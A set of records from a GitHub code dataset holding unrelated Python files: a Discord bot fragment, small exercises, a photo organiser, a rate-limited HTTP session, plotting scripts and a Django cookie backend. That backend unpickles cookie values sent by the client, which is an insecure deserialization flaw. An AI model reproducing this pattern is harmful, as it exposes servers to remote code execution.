if ctx.author.guild_permissions.manage_roles or ctx.author.guild_permissions.administrator or estAdmin(ctx.author.id):\n emojiHash = emoji.id if isinstance(emoji, discord.Emoji) else emoji\n messageId = message.id\n\n if (messageId, emojiHash) not in AUTO_ROLE:\n AUTO_ROLE[messageId, emojiHash] = role.id\n\n try:\n await message.add_reaction(emoji)\n except:\n pass\n await ctx.message.add_reaction(\"👌\")\n else:\n del AUTO_ROLE[messageId, emojiHash]\n await ctx.message.add_reaction(\"👌\")\n await ctx.message.add_reaction(\"❌\")\n\n try:\n await message.remove_reaction(emoji, bot.user)\n except:\n pass\n\n save()\n\n #autorole avec confirmation (sauf reconnaissance automatique)\n @bot.command(name = \"utils_autoroleconf\")\n async def autoroleconf(ctx, role: discord.Role, message: discord.Message, emoji: Union[discord.Emoji, str], channelConf: discord.TextChannel, pingConf: discord.Role, serveurAutoId: Optional[int], roleAutoId: Optional[int]):\n if estAdmin(ctx.author.id):\n emojiHash = emoji.id if isinstance(emoji, discord.Emoji) else emoji\n messageId = message.id\n\n AUTO_ROLE_CONF[messageId, emojiHash] = (role.id, channelConf.id, pingConf.id, serveurAutoId, roleAutoId, None)\n\n try:\n await message.add_reaction(emoji)\n await ctx.message.add_reaction(\"👌\")\n except:\n pass\n\n save()\n\n @bot.command(name = \"utils_autoroleconf_reset\")\n async def autoroleconfreset(ctx):\n if estAdmin(ctx.author.id):\n AUTO_ROLE_CONF.clear()\n await ctx.message.add_reaction(\"👌\")\n\n save()\n\n #fermeture ouverture d'un salon\n @bot.command(name = \"open\")\n async def open(ctx):\n if ctx.author.guild_permissions.administrator or ctx.author.guild_permissions.manage_messages:\n CLOSE.remove(ctx.channel.id)\n save()\n await ctx.message.add_reaction(\"👌\")\n\n @bot.command(name = \"close\")\n async def close(ctx):\n if ctx.author.guild_permissions.administrator or ctx.author.guild_permissions.manage_messages:\n CLOSE.add(ctx.channel.id)\n save()\n await ctx.message.add_reaction(\"👌\")\n\n @bot.command(name = \"avatar\")\n async def avatar(ctx, someone: Optional[discord.User]):\n if someone is None:\n someone = ctx.author\n\n ref = discord.MessageReference(channel_id = ctx.channel.id, message_id = ctx.message.id)\n embed = discord.Embed()\n embed.set_image(url=someone.avatar.url)\n await ctx.send(embed=embed, reference = ref)\n\n\n @bot.command(name=\"redirMsg\")\n async def toto(ctx, guildId: int):\n guild = bot.get_guild(guildId)\n if guild:\n member = await guild.fetch_member(ctx.author.id)\n\n if member.guild_permissions.administrator:\n if guildId not in MODO:\n MODO[guildId] = ctx.channel.id\n else:\n del MODO[guildId]\n await ctx.message.add_reaction(\"👌\")\n\n save()\n\n return bot, TOKEN\n\nif __name__ == \"__main__\":\n bot, token = main()\n\n bot.run(token)\n","repo_name":"fabnem12/squadro-bot","sub_path":"discordUtils/discordutils.py","file_name":"discordutils.py","file_ext":"py","file_size_in_byte":30062,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"16"} +{"seq_id":"31276111018","text":"def main():\n n = int(input())\n terms = []\n s = 0\n i = 1\n while s <= n:\n s += i\n terms.append(i)\n i += 1\n\n del terms[s - n - 1]\n print(len(terms))\n print(*terms)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"e1fe12/learn_python","sub_path":"p02/various_terms.py","file_name":"various_terms.py","file_ext":"py","file_size_in_byte":246,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"41667139670","text":"import math\n\ntop3elves = [0,0,0]\ntop3max = [0,0,0]\n\ncurrentSum = 0\ncurrentElf = 1\n\nwith open(\"day1-input.txt\", \"r\") as f:\n for line in f:\n\n if line.strip():\n currentSum += int(line)\n else:\n if currentSum > min(top3max) :\n top3elves[top3max.index(min(top3max))] = currentElf\n top3max[top3max.index(min(top3max))] = currentSum\n\n currentElf += 1\n currentSum = 0\n \n \n\nfinalAnswer=zip(top3elves,top3max)\n\nfor elf, cal in finalAnswer:\n print(f\"Elf {elf} has {cal} calories\")\n\nprint(f\"the total is {sum(top3max)}\")","repo_name":"MaryGz/adventCalendar2022","sub_path":"day1.2-solution.py","file_name":"day1.2-solution.py","file_ext":"py","file_size_in_byte":611,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"27217689095","text":"# import numpy\nimport numpy as np\n\n# set a random seed to replicate the results\nnp.random.seed(42)\n\n# import matplotlib to visualize the experiment\nimport matplotlib.pyplot as plt\n\n#When we repeat an experiment a large number of times, the average result will be very close to the expected result, i.e. in the long run, random events tend to average out at the expected value. \n#Example: Flipping a coin\n#If we flipped a coin just 10 times we would not be surprised to get 7 heads (even though the expected value is 5).\n#But if we flip it 10,000 times we are very unlikely to get 7,000 heads. The result will likely be within a few percent of 5,000.\n#Let's simulate this coin-flipping example with Python.\n\n\n# generate ten random numbers (0 or 1) with equal probabilities\ncoin_flips_10 = np.random.randint(0,2,10)\n\n# how many heads in 10 coin flips\ncount_heads = sum(coin_flips_10 == 1)\nprint(count_heads)\n\n# empty list used to store the results\nheads_ratio_nflips = []\n\n# generate integers from 5 to 10,000\nn_flips = np.arange(5,10000)\n\nfor flips in n_flips:\n # how many heads / flips\n heads_ratio = sum(np.random.randint(0,2,flips) == 1) / flips\n\n # append ratios\n heads_ratio_nflips.append(heads_ratio)\n \n # set plot size\nplt.figure(figsize=(10,8))\n\n# number of flips on the x axe and heads ratio on y axe\nplt.plot(n_flips, heads_ratio_nflips)\n\n# expected ratio\nplt.plot(n_flips, len(n_flips)*[0.5], 'r--')\n\n# plot settings\nplt.figure(figsize=(10,8))\nplt.xlabel('Flips')\nplt.ylabel('Heads ratio')\nplt.show()\n","repo_name":"RaghavanArun/lighthouse-python-fundamentals","sub_path":"prep_course_statistics-master/The Law of Large Numbers.py","file_name":"The Law of Large Numbers.py","file_ext":"py","file_size_in_byte":1529,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"22765037008","text":"try:\n import cPickle as pickle\nexcept ImportError:\n import pickle\n\nfrom .base import Backend\n\nfrom datetime import datetime, timedelta\n\nfrom backward import settings\n\n\nclass CookieBackend(Backend):\n def get_url_redirect(self, request):\n return request.COOKIES.get(settings.URL_REDIRECT_NAME, None)\n\n def save_url_redirect(self, request, response, url_redirect):\n self.set_cookie(request, response, url_redirect, cookie_name=settings.URL_REDIRECT_NAME)\n\n def get_next_action(self, request):\n if settings.NEXT_ACTION_NAME in request.COOKIES:\n return pickle.loads(request.COOKIES[settings.NEXT_ACTION_NAME])\n\n return {}\n\n def save_next_action(self, request, response, data):\n self.set_cookie(request,\n response,\n pickle.dumps(data, pickle.HIGHEST_PROTOCOL),\n cookie_name=settings.NEXT_ACTION_NAME)\n\n def delete_next_action(self, request, response):\n response.delete_cookie(settings.NEXT_ACTION_NAME, domain=self.get_cookie_domain(request))\n\n def set_cookie(self, request, response, value, cookie_name):\n max_age = settings.COOKIE_MAX_AGE\n\n expires = datetime.strftime(datetime.utcnow() + timedelta(seconds=max_age),\n \"%a, %d-%b-%Y %H:%M:%S GMT\")\n\n try:\n response.set_cookie(cookie_name,\n value,\n max_age=max_age,\n expires=expires,\n domain=self.get_cookie_domain(request),\n secure=settings.COOKIE_SECURE or None)\n except UnicodeEncodeError:\n return False\n\n return True\n\n def get_cookie_domain(self, request):\n cookie_domain = settings.COOKIE_DOMAIN\n\n if cookie_domain and cookie_domain.startswith('.'):\n host = '.'.join(request.get_host().split('.')[-2:])\n\n cookie_domain = cookie_domain % {\n 'host': host\n }\n\n return cookie_domain\n","repo_name":"thoas/django-backward","sub_path":"backward/backends/cookie.py","file_name":"cookie.py","file_ext":"py","file_size_in_byte":2093,"program_lang":"python","lang":"en","doc_type":"code","stars":30,"dataset":"github-code","pt":"16"} +{"seq_id":"42948940811","text":"#Author: Sam Allan\n#Date of Last Revision: 05/20/2023\n#Script: Seattle Ops 301n3 challenge 09\n#Purpose: Create if statements using these logical conditionals below. Each statement should print information to the screen depending on if the condition is met.\n#!Equals: a == b\n#!Not Equals: a != b\n#!Less than: a < b\n#!Less than or equal to: a <= b\n#!Greater than: a > b\n#!Greater than or equal to: a >= b\n#!Create an if statement using a logical conditional of your choice and include elif keyword that executes when other conditions are not met.\n#!Create an if statement that includes both elif and else to execute when both if and elif are not met.\n#Stretch Goals (Optional Objectives)\n#Pursue stretch goals if you are a more advanced user or have remaining lab time.\n#!Create an if statement with two conditions by using and between conditions.\n#!Create an if statement with two conditions by using or between conditions.\n#!Create a nested if statement.\n#Create an if statement that includes pass to avoid errors.\n\n#Variables:\n#sit, storing where the user is sitting as an argument when the function is called.\n#chairs, storing the number of chairs the user has sat in as an integer in a variable.\n\n# MAIN\n#defining function sit_finder to try to find where you are sitting. It can only verify whether or not the user is sitting in a chair.\ndef sit_finder(sit):\n#if the user is sitting in a chair\n if sit == \"chair\":\n #give them a helpful reminder.\n print(\"you're sitting in a chair!\")\n #return the value true to be used later.\n return True\n #else, if they're sitting in something that does not equal a chair\n elif sit != \"chair\":\n #despair\n print(\"where on earth are you sitting?!\")\n #return False value to be used later\n return False\n#defining chair_number function to find how many chairs the user has sat in\ndef chair_number(chairs):\n #if they try to say a word instead of a number\n if isinstance(chairs, str):\n #feign confusion\n print(\"I don't know what you're talking about\")\n #return a 0 integer to be used when the function is called later.\n return 0\n #else if they've sat in fewer than 3 chairs\n elif chairs <= 3:\n #chastise them\n print(\"somebody loves standing\")\n #if they've sat in fewer than 20 chairs\n elif chairs < 20:\n #scold them\n print(\"that's not that many chairs\")\n #if it's greater than 90 chairs\n elif chairs >= 90:\n #make fun of the user\n print(\"whoa, ok, slow down chairmaster\")\n #if it's greater than 50 chairs\n elif chairs > 50:\n #be impressed\n print(\"whoa, buddy, that's a lot of chairs\")\n #if it's fewer than or equal to 50, unless one of the above conditions has already been met\n elif chairs <= 50:\n #be unimpressed\n print(\"ok, pretty average amount of chairs\")\n #otherwise\n else:\n #forget the topic\n print(\"I forgot what we were talking about.\")\n #return the integer value given by any of these conditions that is set off to the variable \"chairs\"\n return chairs\n#calling the function within a variable, asking for user input in the argument.\nsit = sit_finder(input(\"where are you sitting?\"))\n#storing user input in a variable to be used as an argument when the num_chairs function is called\nuser_input = input(\"how many chairs have you sat in?\")\n#if the contents of the user_input variable is a string, attempt to convert it to an integer. \ntry:\n user_input = int(user_input)\nexcept ValueError:\n # If the conversion fails, user_input will remain a string\n pass\n\n#setting another variable to house the function for use in the following two lines\nnum_chairs = chair_number(user_input)\n\n#if they have sat in more than 50 chairs and are currently sitting in a chair\nif num_chairs > 50 and sit:\n #deliver a helpful reminder.\n print(\"you are sitting in a chair, and have sat in more than 50 chairs.\")\n#if the number of chairs they've sat in is equal to 420 or 69\nif num_chairs == 420 or num_chairs == 69:\n #let them know they've been caught.\n print(\"I see what you did there.\")\n\n#if the number of chairs exceeds 1000 \nif num_chairs > 1000:\n #setting a variable to hold the method by which the user sat in so many chairs\n yikes = input(\"how on earth have you sat in so many chairs\")\n #try to see if their input was an integer\n try:\n # if it is an integer, it will be recognized as such henceforth.\n yikes = int(yikes)\n #setting variable to hold an explanation\n varibul = input(\"what are you talking about?\")\n #check to see if their explanation is an integer\n try:\n #if it is, it shall remain that way\n varibul = int(varibul)\n #let the user know you don't understand what's happening.\n print(\"you're insane.\")\n #if int conversion returns valueError(basically, if the input was a string)\n except ValueError:\n #accept explaination\n print(\"ok, I see what you mean.\")\n #same deal here, if the input was a string\n except ValueError:\n #if it is this specific string\n if yikes == \"chairs\":\n #diagnose the user\n print(\"you're insane.\")\n #if it is any other string\n else:\n #feign suspicion\n print (\"sus.\")\n#if number of chairs is less than 50 and the user is not sitting in a chair\nif num_chairs <50 and not sit:\n #go nuts\n print(\"wowowowowowowowowow\")\n #just trying to fit a pass in here somewhere.\nelse:\n pass\n\n# END","repo_name":"theSam1998/Seattle-Ops-301n3-Challenges","sub_path":"OpsChal09.py","file_name":"OpsChal09.py","file_ext":"py","file_size_in_byte":5612,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"27632904044","text":"import pandas as pd\nimport numpy as np\nimport os\nimport datetime\nimport shutil\nimport sys\n\n# ---- define the file paths\npackage_root = os.path.dirname(os.path.abspath(''))\nlibrary = os.path.join(package_root, 'photo_libraries')\n\n# ---- get database\ndf = pd.read_hdf(os.path.abspath('photo_database.h5'), 'input')\nif 'datetime' not in df.columns:\n raise Exception('database does not contain image metadata')\n\n# ---- check that the dates are valid\ncheck_dt = df[pd.notnull(df.datetime)]\ninvalid_dt = check_dt[(check_dt.datetime > datetime.datetime.today()) |\n (check_dt.datetime < datetime.datetime.utcfromtimestamp(0))].index\ndf.loc[invalid_dt, 'datetime'] = np.nan\n\n# ---- create the photo archive folder\nroot = os.path.join(package_root, 'photo_archive')\ntry:\n os.mkdir(os.path.join(root))\n print('created photo archive')\nexcept FileExistsError:\n pass\n\n# ---- create folders for files that do not have metadata\nfor file_type in df.file_type.unique():\n try:\n os.mkdir(os.path.join(root, file_type))\n print('created sub-folder for {}'.format(file_type))\n except FileExistsError:\n pass\n\n# ---- create folder for images that do no have metadata\ntry:\n os.mkdir(os.path.join(root, 'image', 'unknown'))\n print('created sub-folder for images without metadata')\nexcept FileExistsError:\n pass\n\n# ---- create folders for each unique year:\nif df.datetime.notnull().any():\n for year in df.datetime.dt.year.unique():\n if pd.notnull(year):\n try:\n os.mkdir(os.path.join(root, 'image', str(int(year))))\n print('created sub-folder: {}'.format(str(int(year))))\n except FileExistsError:\n pass\n\n# ---- create destination codes\ndef create_destinations(df):\n seed_since_epoch = int((datetime.datetime.now() - datetime.datetime.utcfromtimestamp(0)).total_seconds())\n rng = np.random.RandomState(seed_since_epoch)\n\n df['img_id'] = ['img_id_'+str(i).zfill(10) for i in rng.randint(0,1e10, len(df))]\n df['file_name'] = [df.filepath.loc[i][df.filepath.loc[i].rfind('/')+1:] for i in df.filepath.index]\n\n if df.datetime.notnull().any():\n df['file_name'] = np.where(pd.notnull(df.datetime), 'date_'+df.datetime.dt.strftime('%Y%m%d') + '_' + df.img_id + df.file_ext.str.lower(), df.file_name)\n\n destination = []\n for i in df.index:\n if pd.isnull(df.loc[i, 'datetime']):\n if df.loc[i, 'file_type'] == 'image':\n destination.append(os.path.join(root, df.loc[i, 'file_type'], 'unknown', df.loc[i, 'file_name']))\n else:\n destination.append(os.path.join(root, df.loc[i, 'file_type'], df.loc[i, 'file_name']))\n else:\n destination.append(os.path.join(root, df.loc[i, 'file_type'], df.loc[i, 'datetime'].strftime('%Y'), df.loc[i, 'file_name']))\n df['destination'] = destination\n return df\n\n\n# ---- function to move the file\ndef move_file(idx, df):\n try:\n shutil.move(df.loc[idx,'filepath'], df.loc[idx, 'destination'])\n\n except PermissionError:\n raise PermissionError('permission error moving {} to {}'\\\n .format(df.loc[idx, 'filepath'], df.loc[idx, 'destination']))\n return\n\n\n# ---- function to check for duplicate names and add DUPLICATE if it is\ndef check_for_duplicate_file_name(idx, df):\n i = 1\n while os.path.exists(df.loc[idx, 'destination']):\n if pd.isnull(df.loc[idx, 'datetime']):\n if df.loc[idx, 'file_type'] == 'image':\n df.loc[idx, 'destination'] = os.path.join(root, df.loc[idx, 'file_type'],\n 'unknown', 'DUPLICATE{}_'.format(i) + df.loc[idx, 'file_name'])\n else:\n df.loc[idx, 'destination'] = os.path.join(root, df.loc[idx, 'file_type'],\n 'DUPLICATE{}_'.format(i) + df.loc[idx, 'file_name'])\n else:\n df.loc[idx, 'destination'] = os.path.join(root, df.loc[idx, 'file_type'],\n df.loc[idx, 'datetime'].strftime('%Y'),\n 'DUPLICATE{}_'.format(i) + df.loc[idx, 'file_name'])\n i += 1\n return df\n\n\n# ---- bring together the two functions above to move all of the images\ndef organize_files(df):\n for idx in df.index:\n # ---- make sure that the source file exists\n if not os.path.exists(df.loc[idx, 'filepath']):\n raise Exception('source file {} does not exist'.format(df.loc[idx, 'filepath']))\n else:\n df = check_for_duplicate_file_name(idx, df)\n move_file(idx, df)\n return df\n\n\ndf = create_destinations(df)\ndf = organize_files(df)\ndf.to_hdf('photo_database.h5', 'output')\n","repo_name":"alexdsbreslav/photo_organization","sub_path":"scripts/organize_files.py","file_name":"organize_files.py","file_ext":"py","file_size_in_byte":4799,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"36273302500","text":"\"\"\"\nSession object used to maintain an open session with PTP\n\nAlmost entirely based off of session by kannibalox from their PTPAPI project on GitHub\n\nAuthor: Parker Timmerman\n\"\"\"\n\nimport logging\nimport requests\n\nfrom ptp_config import config\nfrom time import time, sleep\n\nLOGGER = logging.getLogger(__name__)\n\nclass TokenSession(requests.Session):\n \"\"\" Allow rate-limiting requests to a site \"\"\"\n\n def __init__(self, capacity, fill_rate):\n \"\"\" tokens is the total number of tokens in the bucket\n fill_rate is the rate in tokens/second that the bucket will be refilled.\n A request can be made when there are enough tokens in the bucket for the request \"\"\"\n\n requests.Session.__init__(self)\n self.capacity = float(capacity)\n self._tokens = float(capacity) # current tokens in bucket, start at capacity (full)\n self.consumed_tokens = 0\n self.fill_rate = float(fill_rate)\n self.timestamp = time()\n\n def consume(self, tokens):\n \"\"\" Consume tokens from the bucket. Returns True if there were enough tokens, otherwise False. \"\"\"\n\n self.update_tokens()\n if tokens < self._tokens:\n self._tokens -= tokens\n self.consumed_tokens += tokens\n LOGGER.debug(\"Consuming {0} token(s), total tokens consumed so far: {1}\".format(tokens, self.consumed_tokens))\n else:\n return False\n return True\n\n def request(self, *args, **kwargs):\n while not self.consume(1):\n LOGGER.debug(\"Waiting for token bucket to refull...\")\n sleep(1)\n return requests.Session.request(self, *args, **kwargs)\n\n def update_tokens(self):\n if self._tokens < self.capacity:\n now = time()\n delta = self.fill_rate * (now - self.timestamp)\n self._tokens = min(self.capacity, self._tokens + delta)\n self.timestamp = now\n return self._tokens\n\n tokens = (update_tokens)\n\n def base_get(self, url_path, *args, **kwargs):\n return self.get(config.get('Main', 'baseURL') + url_path, *args, **kwargs)\n\n def base_post(self, url_path, *args, **kwargs):\n return self.post(config.get('Main', 'baseURL') + url_path, *args, **kwargs)\n\nLOGGER.debug(\"Initializing token session\")\nsession = TokenSession(3, 0.5)\nsession.headers.update({\"User-Agent\": \"Wget/1.13.4\"})\n","repo_name":"ParkMyCar/MovieManSpiff","sub_path":"ptp_api/session.py","file_name":"session.py","file_ext":"py","file_size_in_byte":2392,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"18183014651","text":"\nimport json\nimport requests\n\nimport settings\nfrom constants import transactino_constants, model_constants, method_constants\nfrom util.input_args import input_args\nfrom util.get_path import get_path\nfrom util.make_headers import make_headers\nfrom util.check_for_announcements import check_for_announcements\n\nfrom .constants import subscription_constants\n\ndef activate(args):\n activate_args = input_args({\n subscription_constants.SUBSCRIPTION_ID: {\n method_constants.INPUT: 'Enter the Subscription ID to activate',\n method_constants.TYPE: str,\n },\n })\n\n payload = {\n transactino_constants.SCHEMA: {\n model_constants.MODELS: {\n model_constants.SUBSCRIPTION: {\n method_constants.METHODS: {\n subscription_constants.ACTIVATE: activate_args,\n },\n },\n },\n },\n }\n\n response = requests.post(\n settings.URL,\n headers=make_headers(),\n data=json.dumps(payload),\n )\n\n check_for_announcements(response)\n\n response_json = json.loads(response.text)\n activate_json = get_path(response_json, [\n transactino_constants.SCHEMA,\n model_constants.MODELS,\n model_constants.SUBSCRIPTION,\n method_constants.METHODS,\n subscription_constants.ACTIVATE,\n ])\n\n print(json.dumps(activate_json, indent=2))\n","repo_name":"NicholasPiano/transactino","sub_path":"jormungand/commands/subscription/activate.py","file_name":"activate.py","file_ext":"py","file_size_in_byte":1283,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"74277809927","text":"#!/usr/bin/env python\n# AUTHOR: William Stafford Noble\n# CREATE DATE: 16 March 2009\nimport sys\nimport os\nimport math\n\nusage = \"\"\"USAGE: make-qq-plot.py \n\nCompare a given set of p-values to the uniform distribution by\ncreating a QQ plot with log-log axes. The program outputs three\nfiles: a gnuplot script (.gnuplot), the data to be plotted\n(.txt) and the plot itself (.png). Note that the stored\nvalues are downsampled to avoid having too many points in the plot.\n\n\nOptions:\n --no-log-scale\n --column-header Header of column from which to get p-values.\n --minus-natural-log Input values are negative log base e.\n --format png|eps (default=png)\n --fontsize (only effective with \"-format eps\")\n --title \n\nIf the p-value file is specified as \"-\", then the program reads from\nstandard input.\n\n\"\"\"\n\n###############################################################################\n# Find a given word in a tab-delimited string of words.\n# Return the index.\ndef findWord(header, word):\n\n words = header.split(\"\\t\")\n for index in range(0, len(words)):\n if (words[index] == word):\n return(index)\n sys.stderr.write(\"Can't find %s in %s.\\n\" % (word, header))\n sys.exit(1)\n\n###############################################################################\n# MAIN\n###############################################################################\n\n# Set default values.\nlog_scale = 1\ncolumn_header = \"\"\nlog_values = 0\nfile_format = \"png\"\nfont_size = 24\ntitle = \"\"\n\n# Parse the command line.\nsys.argv = sys.argv[1:]\nwhile (len(sys.argv) > 2):\n next_arg = sys.argv[0]\n sys.argv = sys.argv[1:]\n if (next_arg == \"--no-log-scale\"):\n log_scale = 0\n elif (next_arg == \"--column-header\"):\n column_header = sys.argv[0]\n sys.argv = sys.argv[1:]\n elif (next_arg == \"--minus-natural-log\"):\n log_values = 1\n elif (next_arg == \"--format\"):\n file_format = sys.argv[0]\n sys.argv = sys.argv[1:]\n elif (next_arg == \"--fontsize\"):\n font_size = int(sys.argv[0])\n sys.argv = sys.argv[1:]\n elif (next_arg == \"--title\"):\n title = sys.argv[0]\n sys.argv = sys.argv[1:]\n else:\n sys.stderr.write(\"Invalid option (%s).\\n\" % next_arg)\n sys.exit(1)\nif (len(sys.argv) != 2):\n sys.stderr.write(usage)\n sys.exit(1)\npvalue_filename = sys.argv[0]\nfileroot = sys.argv[1]\n\n# Open the file for reading.\nif (pvalue_filename == \"-\"):\n pvalue_file = sys.stdin\nelse:\n pvalue_file = open(pvalue_filename, \"r\")\n\n# If a header string was specified, find the relevant column.\nif (column_header != \"\"):\n header = pvalue_file.readline().rstrip()\n column_index = findWord(header, column_header)\n sys.stderr.write(\"Reading p-values from column %d.\\n\" % column_index)\nelse:\n column_index = 0\n\n# Read the p-values from the specified column.\npvalues = []\nnumZeroes = 0\nfor line in pvalue_file:\n line = line.rstrip()\n words = line.split(\"\\t\")\n\n # Skip comment lines.\n if (line[0] == \"#\"):\n continue\n\n # Crash if the line is too short.\n if (len(words) <= column_index):\n sys.stderr.write(\"Too few columns (%d < %d).\\n%s\\n\" \n % (len(words), column_index, line))\n sys.exit(1)\n\n # Skip NaNs.\n if ((words[column_index] == \"NaN\") or\n (words[column_index] == \"nan\")):\n continue\n\n pvalue = float(words[column_index])\n if (log_values):\n pvalue = math.exp(-1.0 * pvalue)\n\n # Count zero p-values.\n if (pvalue == 0):\n numZeroes += 1\n\n # Store this p-value.\n pvalues.append(pvalue)\n\npvalue_file.close()\nnum_pvalues = len(pvalues)\nif (numZeroes != 0):\n sys.stderr.write(\"Warning: Found %d zero p-values.\\n\" % numZeroes)\nsys.stderr.write(\"Read %d p-values from %s.\\n\" % (num_pvalues, \n pvalue_filename))\n\n# Sort the values.\npvalues.sort()\n\n# Open the data file.\ndata_filename = \"%s.txt\" % fileroot\ndata_file = open(data_filename, \"w\")\nsys.stderr.write(\"Creating %s.\\n\" % data_filename)\n\n# We will only print with this density along the x-axis.\nif (log_scale):\n increment = 0.01\nelse:\n increment = 0.001\ncurrent_value = 0\n\n# Print the values to a file.\nrank = 1.0\nnum_printed = 0\nfor pvalue in pvalues:\n\n if (log_scale):\n new_value = math.log(rank / num_pvalues)\n else:\n new_value = rank / num_pvalues\n\n if (current_value == 0) or (new_value >= current_value + increment):\n data_file.write(\"%g\\t%g\\n\" % (rank / num_pvalues, pvalue))\n current_value = new_value\n num_printed += 1\n\n rank += 1.0\ndata_file.close()\nsys.stderr.write(\"Printed %d p-values.\\n\" % num_printed)\n\n# Find the first non-zero p-value.\nfor index in range(0, len(pvalues)):\n min_pvalue = pvalues[index]\n if (min_pvalue != 0):\n break\n\n# Set the range.\nsys.stderr.write(\"Minimum p-value=%g\\n\" % min_pvalue)\nif (1.0 / num_pvalues < min_pvalue):\n min_pvalue = 1.0 / num_pvalues\n sys.stderr.write(\"Minimum rank p-value=%g\\n\" % min_pvalue)\nif (min_pvalue == 0):\n min_value = \"1e-10\"\nelse:\n min_value = \"1e%d\" % (int(math.log(min_pvalue, 10.0)) - 1)\nsys.stderr.write(\"Minimum x-axis value=%s\\n\" % min_value)\n\n# Open the gnuplot file.\ngnuplot_filename = \"%s.gnuplot\" % fileroot\ngnuplot_file = open(gnuplot_filename, \"w\")\nsys.stderr.write(\"Creating %s.\\n\" % gnuplot_filename)\n\n# Print the gnuplot file.\ngnuplot_file.write(\"set output '/dev/null'\\n\")\nif (file_format == \"png\"):\n gnuplot_file.write(\"set terminal png\\n\")\nelif (file_format == \"eps\"):\n gnuplot_file.write(\"set terminal postscript eps %s\\n\" % font_size)\nelse:\n sys.stderr.write(\"Invalid file format (%s).\\n\" % file_format)\n sys.exit(1)\ngnuplot_file.write(\"set xlabel 'Rank p-value'\\n\")\ngnuplot_file.write(\"set ylabel 'Calculated p-value'\\n\")\ngnuplot_file.write(\"set xrange [%s:1]\\n\" % min_value)\ngnuplot_file.write(\"set yrange [%s:1]\\n\" % min_value)\nif (log_scale):\n gnuplot_file.write(\"set logscale xy\\n\")\nif (title != \"\"):\n gnuplot_file.write(\"set title '%s'\\n\" % title)\ngnuplot_file.write(\"plot x notitle with lines lt 1\\n\")\ngnuplot_file.write(\"replot 0.5*x notitle with lines lt 2\\n\")\ngnuplot_file.write(\"replot 2.0*x notitle with lines lt 2\\n\")\ngnuplot_file.write(\"replot '%s' notitle with points\\n\" % data_filename)\ngnuplot_file.write(\"set output\\n\")\ngnuplot_file.write(\"replot\\n\")\ngnuplot_file.close()\n\n# Make the image.\nsys.stderr.write(\"Creating %s.%s.\\n\" % (fileroot, file_format))\nos.system(\"gnuplot %s > %s.%s\" % (gnuplot_filename, fileroot, file_format))\n\n","repo_name":"crux-toolkit/crux-toolkit","sub_path":"test/calibration/make-qq-plot.py","file_name":"make-qq-plot.py","file_ext":"py","file_size_in_byte":6397,"program_lang":"python","lang":"en","doc_type":"code","stars":28,"dataset":"github-code","pt":"16"} +{"seq_id":"24066709177","text":"def process(arr, left, right):\r\n \r\n if left == right:\r\n return\r\n \r\n mid = left + int((right-left)>>1)\r\n process(arr, left, mid)\r\n process(arr, mid + 1, right)\r\n merge(arr, left, mid, right)\r\n\r\n\r\n\r\ndef merge(arr, left, mid, right):\r\n \r\n help_list = [0] * (right-left+1)\r\n \r\n i = 0\r\n left_index = left\r\n right_index = mid + 1\r\n \r\n while left_index <= mid and right_index <= right:\r\n if arr[left_index] < arr[right_index]:\r\n help_list[i] = arr[left_index]\r\n left_index += 1\r\n else:\r\n help_list[i] = arr[right_index]\r\n right_index += 1\r\n i += 1\r\n while left_index <= mid:\r\n help_list[i] = arr[left_index]\r\n left_index += 1\r\n i += 1\r\n while right_index <= right:\r\n help_list[i] = arr[right_index]\r\n right_index += 1\r\n i += 1\r\n \r\n for i in range(right-left+1):\r\n arr[left+i] = help_list[i]\r\n\r\n\r\n\r\nif __name__ == '__main__':\r\n \r\n arr = list(range(20))\r\n\r\n import random\r\n random.shuffle(arr)\r\n print(arr)\r\n\r\n process(arr, 0, len(arr)-1)\r\n print(arr)\r\n\r\n# [4, 10, 8, 16, 17, 3, 13, 9, 15, 7, 14, 18, 11, 2, 5, 6, 1, 12, 19, 0]\r\n# [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19]\r\n","repo_name":"iubizi/014-merge-sort","sub_path":"merge sort.py","file_name":"merge sort.py","file_ext":"py","file_size_in_byte":1297,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"71426528969","text":"import matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D\nimport numpy as np\n\n##### PARAMETERS #####\n\nTf = 100000 # Final time - seconds\nm = 1 # Particle mass\ngamma = 2 # Friction\nkb = 1 # Boltzmann cte = 1 for simplicity\nT = 300 # [k] - Temperature\n\n\n###### Discrete time\nt = np.linspace(0, 1000, num = Tf)\ndt = t[2]-t[1]\n\n###### Noise\naux = np.zeros(Tf) # auxiliar array of the right size\n\n# Function to create random numbers\nRandom = lambda n: np.random.normal(loc=0.0, scale=1.0) # Generate random number\nMapRandom = map(Random,aux)\n\n# Array of Noise\neta = np.sqrt(2*kb*T*gamma)*np.array(list(MapRandom)) # eta(t)\n\n###### Initial position and velocity\n\nx0 = 0 \nv0 = 0 \n\n###### Arrays of position and velocities\n\nx = np.zeros(1)\nx[0] = x0\nv = np.zeros(1)\nv[0] = v0\n\n###### Discrete Langevin Equation\n\ni = 1\nwhile i < Tf:\n v = np.append(v, ((dt/m)*eta[i]+v[i-1])/(1+(dt/m)*gamma))\n x = np.append(x, x[i-1] + v[i]*dt)\n i+=1\nfig, (left, right) = plt.subplots(1, 2, figsize=(15,5))\n\nright.plot(t, x)\nleft.plot(t, v)\n\nfig.suptitle('1-D Броуновское движение', fontsize=20)\nright.set(xlabel = \"Время, с\", ylabel = \"x(t)\")\nleft.set(xlabel = \"Время, с\", ylabel = \"v(t)\")\n\nright.set_xlim([0, 1000]);\nleft.set_xlim([0, 